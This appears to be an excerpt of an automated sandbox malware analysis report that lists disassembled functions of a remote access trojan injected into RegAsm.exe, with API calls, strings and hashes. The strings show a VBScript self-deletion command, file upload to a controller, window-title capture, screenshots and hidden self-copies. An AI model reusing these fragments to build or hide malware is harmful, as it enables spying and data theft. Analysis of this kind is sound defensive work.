                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable
                                                                                              • String ID: >Y
                                                                                              • API String ID: 1464849758-2491313631
                                                                                              • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                              • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                              • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                              • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                              Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0040CE42
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                              • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                              • _wcslen.LIBCMT ref: 0040CF21
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                              • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                              • _wcslen.LIBCMT ref: 0040D001
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                              • CloseHandle.KERNEL32 ref: 0040D068
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                              • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                              • API String ID: 1579085052-2309681474
                                                                                              • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                                              • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                              • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                                              • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                              Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                              • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                              • _wcslen.LIBCMT ref: 0041C1CC
                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                              • GetLastError.KERNEL32 ref: 0041C204
                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                              • GetLastError.KERNEL32 ref: 0041C261
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                              • String ID: ?
                                                                                              • API String ID: 3941738427-1684325040
                                                                                              • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                              • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                              • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                              • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                              Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                              • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                              • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                              • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                              • String ID: /stext "$0TG$0TG$NG$NG
                                                                                              • API String ID: 1223786279-2576077980
                                                                                              • Opcode ID: f258d1b295b7feb0e58cda8d480d41af2e648384ee588900e3069f874c09cf4e
                                                                                              • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                              • Opcode Fuzzy Hash: f258d1b295b7feb0e58cda8d480d41af2e648384ee588900e3069f874c09cf4e
                                                                                              • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                              Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumOpen
                                                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                              • API String ID: 1332880857-3714951968
                                                                                              • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                              • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                              • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                              • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                              Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                              • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                              • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                              • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                              • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                              • String ID: Close
                                                                                              • API String ID: 1657328048-3535843008
                                                                                              • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                              • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                              • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                              • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                              Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$Info
                                                                                              • String ID:
                                                                                              • API String ID: 2509303402-0
                                                                                              • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                              • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                              • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                              • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                              Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                              • __aulldiv.LIBCMT ref: 00408D88
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                              • API String ID: 3086580692-2582957567
                                                                                              • Opcode ID: 0467a7e48732a05145114b3a2abccf03915ba3ad91a522f01a416acf516984d4
                                                                                              • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                              • Opcode Fuzzy Hash: 0467a7e48732a05145114b3a2abccf03915ba3ad91a522f01a416acf516984d4
                                                                                              • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                              Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                              • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                              • API String ID: 3795512280-1152054767
                                                                                              • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                                                              • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                              • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                                                              • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                              Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                              • _free.LIBCMT ref: 0045137F
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 004513A1
                                                                                              • _free.LIBCMT ref: 004513B6
                                                                                              • _free.LIBCMT ref: 004513C1
                                                                                              • _free.LIBCMT ref: 004513E3
                                                                                              • _free.LIBCMT ref: 004513F6
                                                                                              • _free.LIBCMT ref: 00451404
                                                                                              • _free.LIBCMT ref: 0045140F
                                                                                              • _free.LIBCMT ref: 00451447
                                                                                              • _free.LIBCMT ref: 0045144E
                                                                                              • _free.LIBCMT ref: 0045146B
                                                                                              • _free.LIBCMT ref: 00451483
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                              • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                              • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                              Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                              • API String ID: 489098229-1431523004
                                                                                              • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                              • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                              • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                              • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                              Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32 ref: 00413768
                                                                                                • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                              • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                              • API String ID: 1913171305-3159800282
                                                                                              • Opcode ID: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                                                              • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                              • Opcode Fuzzy Hash: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                                                              • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                              Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                              • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                              • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                              • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                              Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                              • GetLastError.KERNEL32 ref: 00455D6F
                                                                                              • __dosmaperr.LIBCMT ref: 00455D76
                                                                                              • GetFileType.KERNEL32 ref: 00455D82
                                                                                              • GetLastError.KERNEL32 ref: 00455D8C
                                                                                              • __dosmaperr.LIBCMT ref: 00455D95
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                              • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                              • GetLastError.KERNEL32 ref: 00455F31
                                                                                              • __dosmaperr.LIBCMT ref: 00455F38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                              • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                              • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                              • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                              Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID: \&G$\&G$`&G
                                                                                              • API String ID: 269201875-253610517
                                                                                              • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                              • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                              • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                              • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                              Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 65535$udp
                                                                                              • API String ID: 0-1267037602
                                                                                              • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                              • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                              • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                              • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                              Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                              • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
